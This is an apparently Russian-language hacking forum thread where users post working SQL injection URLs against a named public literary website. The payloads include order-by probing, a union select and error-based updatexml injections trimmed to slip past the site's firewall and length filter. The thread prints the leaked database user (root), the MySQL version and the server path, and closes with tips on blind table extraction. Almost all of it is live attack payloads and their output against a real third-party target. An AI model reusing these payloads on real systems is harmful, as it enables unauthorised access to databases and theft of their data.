Сообщение от
Always
http://www.grafomanam.net/author/ADAMANASTAS'+order+by+17+--+
http://www.grafomanam.net/author/ADAMANASTAS'+order+by+18+--+ ошибка
не пойму что не так
http://www.grafomanam.net/author/ADAMANASTAS'+/*!union*/+(select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 )+--+
вырезает некоторые конструкции, а так-же полностью блокирует запрос по рейтингу вхождения в него опасных конструкций.
Очень жестокие фильтры, очень много критериев, в том числе проверяется длина(49 символов):
Код:
http://www.grafomanam.net/author/ADAMANASTAS%27*updatexml(0,lpad(user(),22,0x3A),1)%23
General error: 1105 XPATH syntax error: '
::::::::root@localhost'
Все сжимал буквально по одному символу, на один символ больше - уже блок, зато юзер - root При WAF - очень редкое явление.
UDP1:
Код:
http://www.grafomanam.net/author/ADAMANASTAS%27*updatexml(0,concat(0x3A,user()),1)%23
В этом варианте concat так-же работает, если будет блок - воспользуйтесь вариантом выше.
UDP2:
Еще варианты сжатия:
Код:
При спец. символах в выводе:
http://www.grafomanam.net/author/ADAMANASTAS%27*updatexml(0,user(),1)%23
Без них(Работает не всегда):
http://www.grafomanam.net/author/ADAMANASTAS%27*updatexml(0,concat(':',user()),1)%23
UDP4:
Забыл про саму строку:
Код:
http://www.grafomanam.net/author/%27*updatexml(0,concat(':',version()),1)%23
5.5.33-log
Путь очень длинный:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]usr[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]local[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]www[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]apache22[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]data[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]grafomanam[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]sites[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]index[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php
[/COLOR][/COLOR]
Если только блайндом таблицы выводить с брутом полей - на простой вывод идет очень много символов. MySQL на UNIX-сокете висит, так что удаленно не подключится. Или как вариант - обойти ЧПУ, если фильтр на длину в нем.